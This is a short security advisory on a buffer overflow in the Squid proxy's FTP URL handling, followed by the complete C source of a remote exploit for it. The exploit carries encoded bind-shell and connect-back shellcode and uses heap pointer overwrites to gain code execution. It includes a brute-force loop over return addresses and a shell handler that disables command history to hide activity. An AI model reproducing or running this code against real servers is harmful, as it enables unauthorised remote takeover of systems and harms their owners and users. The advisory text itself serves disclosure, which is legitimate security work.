source: http://www.securityfocus.com/bid/4148/info A buffer overflow exists in the Squid proxy server's FTP URL handling. If a user has the ability to use the Squid process to proxy FTP requests, it may be possible for the user make a malicious request. By sending a custom-crafted ftp:// URL through the squid proxy, it is possible to crash the server, requiring manual restart to resume normal operation. This problem could also be exploited to allow the execution of code with the privileges of the Squid process, typically 'nobody'. /** ** *OLD* *OLD* *OLD* *OLD**OLD* *OLD**OLD* *OLD**OLD* *OLD**OLD* *OLD* ** ** linux/x86 2.0 <= squid <= 2.4.DEVEL4 remote exploit (c) gunzip ** ** to compile type 'make squidx' ** ** Version 2.4STABLE(*) are vulnerable too but you have to play with ** USERLEN, NOPNUM, PASSLEN values to get exploit works (because of the ** different memory layout). Read below how to write new targets. ** ** This is however a rare exploitable bug because ** ** - Squid dies every time you overflow it and you have to wait > 10 sec ** - You can't bruteforce too much or squid will rest in peace forever ** - You MUST have the rights (acl) to use ftp proxying (not in default conf) ** - Address differs alot (return addresses) from distro to distro ** - Victim host must have an ftp server running to connect to ** - Yes, you can change the host who runs ftp server but in this way ** you mess up the align so the exploit won't work (have to fix this) ** ** I'll put new versions if I've time on ** http://members.xoom.it/gunzip/ ** ** comments to gunzip@ircnet - mAilto: <[email protected]> ** ** TODO: check align against host field, make real targets ** ** Version 0.4 ** ** kisses to tankie ** greets: arcangelo, jestah, sorbo, and daphiel for testing ** ** *OLD* *OLD* *OLD* *OLD**OLD* *OLD**OLD* *OLD* *OLD* *OLD* *OLD* *OLD* **/ /** ** Here are the young men, well where have they been ? **/ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/socket.h> #include <sys/time.h> #include <sys/types.h> #include <netinet/in.h> #include <arpa/inet.h> #include <netdb.h> #include <errno.h> #include <string.h> #include <fcntl.h> #include <getopt.h> char inetd_shellcode[] = /* * binds an inetd shell on port 5002 (lsd-pl.net + s-poly by zillion) */ "\x4b\xeb\x11\x5e\x31\xc9\xb1\x81\x80\x6c\x0e\xff\xd4\x80\xe9" "\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\xbf\xf6\x2d\x05\x94" "\x24\x3c\x03\x03\x47\x3c\x3c\x03\x36\x3d\x42\x5d\xb7\x24\x3a" "\x3c\x01\x37\x5d\xbb\x24\x25\x2b\x27\x5d\xb5\x6d\x84\xdf\xa1" "\x54\xbc\xad\xd3\xd3\xd3\x39\x37\x3c\x43\xf4\x46\x3a\x39\xf4" "\x47\x48\x46\x39\x35\x41\xf4\x48\x37\x44\xf4\x42\x43\x4b\x35" "\x3d\x48\xf4\x46\x43\x43\x48\xf4\x03\x36\x3d\x42\x03\x47\x3c" "\xf4\x47\x3c\xf4\x01\x3d\x12\x03\x48\x41\x44\x03\x02\x4c\xf4" "\x0f\x03\x49\x47\x46\x03\x47\x36\x3d\x42\x03\x3d\x42\x39\x48" "\x38\xf4\x03\x48\x41\x44\x03\x02\x4c\x0f\x39\x37\x3c\x43\xf4" "\x4d\x39\x35\x3c"; char forking_bind[] = /* * by eSDee - www.netric.org, encoded with s-poly by zillion */ "\x57\x5f\xeb\x11\x5e\x31\xc9\xb1\xc8\x80\x44\x0e\xff\x2b\x49" "\x41\x49\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x06\x95\x06\xb0" "\x06\x9e\x26\x86\xdb\x26\x86\xd6\x26\x86\xd7\x26\x5e\xb6\x88" "\xd6\x85\x3b\xa2\x55\x5e\x96\x06\x95\x06\xb0\x25\x25\x25\x3b" "\x3d\x85\xc4\x88\xd7\x3b\x28\x5e\xb7\x88\xe5\x28\x88\xd7\x27" "\x26\x5e\x9f\x5e\xb6\x85\x3b\xa2\x55\x06\xb0\x0e\x98\x49\xda" "\x06\x95\x15\xa2\x55\x06\x95\x25\x27\x5e\xb6\x88\xd9\x85\x3b" "\xa2\x55\x5e\xac\x06\x95\x06\xb0\x06\x9e\x88\xe6\x86\xd6\x85" "\x05\xa2\x55\x06\x95\x06\xb0\x25\x25\x2c\x5e\xb6\x88\xda\x85" "\x3b\xa2\x55\x5e\x9b\x06\x95\x06\xb0\x85\xd7\xa2\x55\x0e\x98" "\x4a\x15\x06\x95\x5e\xd0\x85\xdb\xa2\x55\x06\x95\x06\x9e\x5e" "\xc8\x85\x14\xa2\x55\x06\x95\x16\x85\x14\xa2\x55\x06\x95\x16" "\x85\x14\xa2\x55\x06\x95\x25\x3d\x04\x04\x48\x3d\x3d\x04\x37" "\x3e\x43\x5e\xb8\x60\x29\xf9\xdd\x25\x28\x5e\xb6\x85\xe0\xa2" "\x55\x06\x95\x15\xa2\x55\x06\x95\x5e\xc8\x85\xdb\xa2\x55\xc0" "\x6e"; #define IP "\x7f\x01\x01\x01" /* 127.1.1.1 */ #define DPORT "\x99\x99" /* 39321 */ char connectback_shellcode[] = /* * by gloomy - www.netric.org */ "\x31\xc0\xb0\x02\xcd\x80\x31\xdb\x39\xd8\x75\x54" "\x50\x40\x50\x40\x50\x89\xe1\x43\xb0\x66\xcd\x80" "\x4b\x53\x53\x68" IP "\x66\x68" DPORT "\xb3\x02" "\x66\x53\x89\xe2\xb3\x10\x53\x52\x50\x89\xe1\xb3" "\x03\xb0\x66\xcd\x80\x31\xc9\x39\xc1\x75\x23\xb1" "\x02\xb0\x3f\xcd\x80\x49\x75\xf9\xb0\x3f\xcd\x80" "\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89" "\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80\x31\xc0" "\x40\xcd\x80"; #define CONNECT_BACK 0x1 #define CONNECT_TO 0x10 #define IP_OFFSET 28 #define PORT_OFFSET 34 struct hits { char * desc ; char * code ; unsigned short flag ; unsigned short port ; } ht[]= { { "forking bind shellcode (45295)", forking_bind, CONNECT_TO, 45295 }, { "binds a shell via inetd (5002)", inetd_shellcode, CONNECT_TO, 5002 }, { "connects back on supplied host (39321)", connectback_shellcode, CONNECT_BACK, 39321 }, { NULL, 0, 0 } }; #define TIMEOUT 0x5 #ifndef INADDR_NONE #define INADDR_NONE 0xffffffff #endif #ifndef INADDR_ANY #define INADDR_ANY 0x00000000 #endif #ifdef DEBUG #define debug(x...) printf(x) #else #define debug(x...) #endif /** ** a little rip from teso fmtlib **/ #define OCT( b0, b1, b2, b3, addr ) { \ b0 = (addr >> 24) & 0xff; \ b1 = (addr >> 16) & 0xff; \ b2 = (addr >> 8) & 0xff; \ b3 = (addr ) & 0xff; \ } void shell( int fd ) { int rd ; fd_set rfds; static char buff[ 1024 ]; char INIT_CMD[] = "unset HISTFILE; echo; id; uname -a;\n"; if (write(fd, INIT_CMD, strlen( INIT_CMD )) < strlen(INIT_CMD)) { fprintf(stderr,"[-] Error sending evil commands"); exit( EXIT_FAILURE ); } while(1) { FD_ZERO( &rfds ); FD_SET(0, &rfds); FD_SET(fd, &rfds); if(select(fd+1, &rfds, NULL, NULL, NULL) < 1) { perror("[-] Select"); exit( EXIT_FAILURE ); } if( FD_ISSET(0, &rfds) ) { if( (rd = read(0, buff, sizeof(buff))) < 1) { perror("[-] Read"); exit( EXIT_FAILURE ); } if( write(fd,buff,rd) != rd) { perror("[-] Write"); exit( EXIT_FAILURE ); } } if( FD_ISSET(fd, &rfds) ) { if( (rd = read(fd, buff, sizeof(buff))) < 1) { exit( EXIT_SUCCESS ); } write(1, buff, rd); } } } unsigned long resolve( char * host ) { unsigned long rev ; struct hostent * he ; if (( rev = inet_addr( host )) != INADDR_NONE ) { return rev ; } if ( (he = gethostbyname( host )) == NULL ) { perror("[-] Gethostbyname"); return -1; } else { return ((struct in_addr *)(he->h_addr))->s_addr ; } } int connect_to_host( unsigned long ip, unsigned short port ) { int ret, flags, s ; struct sockaddr_in server ; memset( &server, 0x0, sizeof(server) ); server.sin_port = htons ( port ); server.sin_family = AF_INET ; server.sin_addr.s_addr = ip ; if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1 ) { perror("[-] Socket"); return -1 ; } /** ** sets non blocking socket and connects, ripped somewhere **/ if ((flags = fcntl (s, F_GETFL, 0)) == -1 ) { close( s ); return -1; } if (fcntl(s, F_SETFL, flags | O_NONBLOCK) == -1) { close( s ); return -1; } ret = connect(s, (struct sockaddr *)&server, sizeof(server)); if ( ret < 0 ) { if ( errno != EINPROGRESS ) { close( s ); return -1; } else { int n ; struct timeval tv = { TIMEOUT, 0 }; fd_set rset, wset; FD_ZERO( &rset ); FD_ZERO( &wset ); FD_SET( s, &rset ); FD_SET( s, &wset ); if ((n = select( s + 1, &rset, &wset, NULL, &tv)) == -1 ) { perror("[-] Select"); return -1; } /** ** handles timeout **/ if (n == 0) { close( s ); fprintf(stderr,"[-] Timeout\n"); return -1; } if (FD_ISSET( s, &rset ) || FD_ISSET( s, &wset )) { int error = 0 ; int len = sizeof( error ); if (getsockopt(s, SOL_SOCKET, SO_ERROR, &error, &len) == -1) { perror("[-] Getsockopt"); return -1; } if (error != 0) { debug("[*] SO_ERROR != 0\n"); return -1; } } else { return -1 ; } } } /** ** restores flags and returns **/ if ( fcntl(s, F_SETFL, flags) == -1 ) return -1; else return s; } size_t net_write( int fd, char * buf, size_t size ) { struct timeval tv = { TIMEOUT, 0 }; fd_set wfds ; int ret ; FD_ZERO( &wfds ); FD_SET( fd, &wfds ); if ( (ret = select( fd+1, NULL, &wfds, NULL, &tv )) == -1 ) { perror("[-] Select"); exit( EXIT_FAILURE ); } if ( ret == 0 ) { close( fd ); fprintf(stderr,"[-] Timeout\n"); exit( EXIT_FAILURE ); } if ( FD_ISSET( fd, &wfds ) ) { return( write( fd, buf, size ) ); } else { fprintf(stderr,"[-] Error in sending data\n"); exit( EXIT_FAILURE ); } } size_t net_read( int fd, char * buf, size_t size ) { struct timeval tv = { TIMEOUT, 0 }; fd_set rfds ; int ret ; FD_ZERO( &rfds ); FD_SET( fd, &rfds ); if ( (ret = select( fd+1, NULL, &rfds, NULL, &tv )) == -1 ) { perror("[-] Select"); exit( EXIT_FAILURE ); } if ( ret == 0 ) { close( fd ); fprintf(stderr,"[-] Timeout\n"); exit( EXIT_FAILURE ); } if ( FD_ISSET( fd, &rfds ) ) { return( read( fd, buf, size ) ); } else { fprintf(stderr,"[-] Error in sending data\n"); exit( EXIT_FAILURE ); } } char * make_connback_shellcode( const char * hellcode, unsigned long ip, unsigned short port, int ip_offset, int port_offset ) { /** ** ip and port MUST be in host byte order **/ char a, b, c, d; char * hell = (char *)strdup( hellcode ); fflush( stderr ); if ( !hell ) { fprintf( stderr, "[-] Out of memory !\n"); exit( EXIT_FAILURE ); } debug("[*] Using ip=0x%.8x port=%d\n", (unsigned int)ip, port ); /** ** can't contain 0x0a and 0x0d too !! **/ OCT( a, b, c, d, ip ); if ( ( !a || !b || !c || !d ) || (( a == 0xa )||( b == 0xa )||( c == 0xa )|| ( d == 0xa ))|| (( a == 0xd )||( b == 0xd )||( c == 0xd )|| ( d == 0xd )) ) { fprintf(stderr, "[-] Ip contains invalid byte(s) that can't be in the shellcode\n" "[-] Change ip/shellcode and retry.\n"); exit( EXIT_FAILURE ); } if ( ( !(port & 0xff ) || !(port & 0xff00 )) || ( (( port & 0xff )== 0xa ) || (( port & 0xff00 )== 0xa )) || ( (( port & 0xff )== 0xd ) || (( port & 0xff00 )== 0xd )) ) { fprintf(stderr, "[-] Port contains invalid byte(s) that can't be in the shellcode\n" "[-] Change bindport/shellcode and retry.\n"); exit( EXIT_FAILURE ); } *(unsigned long *)( hell + ip_offset ) = htonl( ip ); *(unsigned short *)( hell + port_offset ) = htons( port ); return hell; } /** ** if you have time to add real targets send me them, ** I'll return to you the xpl with all new targets and fixes **/ #define NOPNUM 800 #define USERLEN 11 #define PASSLEN 28 #define URLLEN 24 #define SMARTJUMP "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" #define MASK 0x7 #define BRUTE_START ( 0x346000 + tg[n].retloc ) #define BRUTE_END ( 0x366000 + tg[n].retloc ) #define PORT 3128 #define DELAY 12 #define request2size(req) ( req += (sizeof( size_t ) + MASK) &~ MASK ) /** ** retloc : ** echo 0x`objdump -R /usr/sbin/squid | grep write | awk '{print $1}'` ** ** retaddr: ** gdb squid `pidof squid` then on another console run the exploit ** wait for squid to segfault, if it segfaults to an address like ** 0x08041XXX then you just have to look for nopcode just at ** 0xRETLOC + 346000 (nops look like 0xeb27eb27) ** ** ie. if your retloc is 0x080bb1f8 then just do something like ** (gdb) x/100000x 0x080bb1f8+345000 ** ** padding: ** if squid does not segfault on an address like 0x08XXXXXX ** then you have to play with lenght of password, user or url **/ struct options { char * desc ; unsigned long retaddr ; unsigned long retloc ; } tg[]= { { "2.4.DEVEL4 - Debian 3.0 from src" , 0x08401ba4, 0x080bb1f8 }, { "2.3STABLE5 - Debian 3.0 from src" , 0x0841982c, 0x080b80a8 }, { NULL, 0, 0 } }; void usage( char * a ) { fprintf( stderr, "Usage: %s -v victim [options]\n\n" "-v\tvictim ip or fqhn\n" "-p\tport to connect to (default 3128)\n" "-f\tdoes not check if host is vulnerable (forces exploit)\n" "-j\tjust check if host is vulnerable\n" "-i\tip address for connect back shellcode\n" "-P\tport of connect back shellcode\n" "-t\tone of the targets (for a list type -t X)\n" "-c\tone of the shellcodes (for a list type -c X)\n" "-b\tbruteforce mode\n" "-s\tstep for bruteforce\n" "-d\tdelay between attacks (12 secs default)\n" "-n\tnumber of nops (try 800, 1024, 1500, 2068)\n" "-r\treturn address (shellcode address)\n" "-g\taddress to be overwritten\n\n", a ); exit( EXIT_FAILURE ); } void show_target_list() { int i; fprintf( stderr, "[+] TARGETS:\n\n"); for (i = 0 ; tg[ i ].desc ; i++ ) fprintf ( stderr, " %d - %s\n", i, tg[ i ].desc); printf("\n"); exit( EXIT_FAILURE ); } void show_code_list() { int i; fprintf( stderr, "[+] SHELLCODES\n\n"); for (i = 0 ; ht[ i ].desc ; i++ ) fprintf ( stderr, " %d - %s\n", i, ht[ i ].desc ); printf("\n"); exit( EXIT_FAILURE ); } int squid_check_if_vuln( unsigned long ip, char * host ) { int s ; char buf[ 1024 ]; char pad[ 64 ]; memset( buf, 0x0, sizeof(buf) ); memset( pad, 0x7e, sizeof(pad) ); pad[ 63 ] =0; snprintf( buf, sizeof(buf) - 1, "GET ftp://%s:%s@%s/ HTTP/1.0\r\n\r\n", pad, pad, host ); buf[ 1024 - 1 ] =0; if ( (s = connect_to_host( ip, 3128 )) == -1 ) return 0; if (net_write( s, buf, strlen(buf) ) == strlen(buf)) { memset( buf, 0x0, sizeof(buf) ); if( net_read( s, buf, sizeof(buf)) > 0 ) { close( s ); return 0; } else { close( s ); return 1; } } close( s ); return 0; } /** ** every leeto exploit MUST have dots in it **/ void wait_dots( int s ) { int i; fprintf( stdout, "[+] Sleeping %d secs to let squid restart", s); for ( i=0; i <= s ; i++ ) { fflush( stdout ); fprintf(stdout, "."); sleep( 1 ); } fprintf( stdout, "\n" ); } int main(int argc, char *argv[]) { unsigned long ip = 0x7f000001, local_ip = 0x0, retaddr = 0x0; unsigned int len, i, step = NOPNUM - 256, nopnum = NOPNUM, delay = DELAY; unsigned short port = PORT ; int opt, s, n =0, c =0, brute =0, force =0; char user [ 128 ]; char pass [ 128 ]; char url [ 128 ]; char evil [ 4096 ]; char nops [ NOPNUM ]; char * t ; char * host = "0.0.0.0" ; char * victim = "127.0.0.1"; fprintf(stdout, "\nlinux/x86 remote exploit against squid <= 2.4.STABLE3 by gunzip\n\n"); if ( argc < 3 ) usage( argv[0] ); while ((opt = getopt(argc, argv, "n:d:i:P:jfp:c:t:v:r:g:bs:h")) != EOF) { switch(opt) { case 'd': delay = atoi(optarg); break; case 'n': nopnum = atoi(optarg); break; case 'i': local_ip = inet_addr(optarg); break; case 'P': ht[c].port = atoi(optarg); break; case 'f': force=1; break; case 'j': force=-1; break; case 'p': port = atoi(optarg) ; case 'c': if ( *optarg == 'X' ) show_code_list(); else c = atoi(optarg); break; case 't': if ( *optarg == 'X' ) show_target_list(); else n = atoi(optarg); break; case 'v': victim = strdup( optarg ); break ; case 'r': tg[n].retaddr = strtoul( optarg, NULL, 16 ); break ; case 'g': tg[n].retloc = strtoul( optarg, NULL, 16 ); break ; case 'b': brute=1; break; case 's': step=atoi(optarg); break; case 'h': default: usage( "./squidx" ); break; } } if ( ht[c].port > 65535 || ht[c].port < 1 ) { fprintf(stderr, "[-] Not valid port for connect back code\n"); return -1; } if ( ht[c].flag & CONNECT_BACK ) { if ( !local_ip || local_ip == -1 ) { fprintf(stderr,"[-] You must supply a valid ip for connect back shellcode.\n"); return -1; } ht[c].code = make_connback_shellcode( ht[c].code, ntohl( local_ip ), ht[c].port, IP_OFFSET, PORT_OFFSET ); } if ( (ip = resolve( victim )) == -1 ) { fprintf(stderr, "[-] Cannot resolve victim ip\n"); return -1; } if ( !force ) { if ( squid_check_if_vuln( ip, host ) ) fprintf(stdout, "[+] Host seems vuln !\n"); else { fprintf(stderr, "[-] Host seems not vuln, sorry.\n"); return -1; } if ( force == -1 ) return 1; wait_dots( 12 ); } fprintf(stdout,"[+] Target %s\n", tg[n].desc); fprintf(stdout,"[+] Host is %s\n", victim ); /** ** this is for align and overflow **/ memset( user, 0x7e, USERLEN ); user[ USERLEN ] = 0; memset( pass, 0x7e, PASSLEN ); pass[ PASSLEN ] = 0 ; len = 64 + strlen( user ) + strlen( pass ) + strlen( host ) + URLLEN; t = (char *)malloc( len ); memset( evil, 0x00, sizeof(evil)); memset( nops, 0xeb, sizeof(nops)); memset( url, 0x41, sizeof(url)); /** ** that's because 0x27 act as a nop **/ for ( i=1; i < sizeof(nops) ; i+=2 ) nops[ i ] = 0x27 ; nops[ nopnum - strlen(ht[c].code) - 8 ] = 0 ; snprintf( evil, sizeof(evil)-1, "Accept: %s%s%s\r\n\r\n", nops, SMARTJUMP, ht[c].code); for ( retaddr=(brute ? BRUTE_START : tg[n].retaddr ); retaddr <= (brute ? BRUTE_END : tg[n].retaddr ); reta ddr += step ) { memset( t, 0x0, len ); fprintf(stdout,"[+] Using retaddr=0x%.8x retloc=0x%.8x code=%d step=%d\n", (u_int)retaddr, (u_int)tg[n].retloc, strlen(ht[c].code), step); *(long *)&url[0] = 0x4142432f ; /* dummy */ *(long *)&url[4] = 0xfffffffc ; /* prevsize */ *(long *)&url[8] = 0xfffffffc ; /* size field */ *(long *)&url[12] = 0xdeadbeef ; /* dummy */ *(long *)&url[16] = tg[n].retloc - 12 ; /* fd */ *(long *)&url[20] = retaddr ; /* bk */ url[ URLLEN ] = 0 ; debug("[*] Using host=%d user=%d url=%d pass=%d\n", strlen(host), strlen(user), strlen(url), strlen(pass)); debug("[*] Using buffer_len=%d real_malloced_size=%d\n", len, request2size( len )); strcat( t, "GET " ); strcat( t, "ftp://" ); strcat( t, user ); strcat( t, ":" ); strcat( t, pass ); strcat( t, "@" ); strcat( t, host ); strcat( t, url ); strcat( t, " HTTP/1.0\r\n" ); debug("[*] Using string=%d evil=%d\n", strlen(t), strlen(evil)); if ( (s = connect_to_host( ip, 3128 )) == -1 ) { fprintf(stderr, "[-] Could not connect to host %s\n", victim ); return -1; } net_write( s, t, strlen(t) ); net_write( s, evil, strlen(evil) ); if (( brute ) && !(brute++ % 5) ) wait_dots( 22 ); else wait_dots( 12 ); close( s ); sleep( 1 ); if ( ht[c].flag & CONNECT_TO ) { int y = connect_to_host( ip, ht[c].port ); fprintf( stdout, "[+] Trying connecting to the backdoor\n"); if ( y > 0 ) shell( y ); } fprintf(stdout, "[+] I did not work.\n"); } return 1; }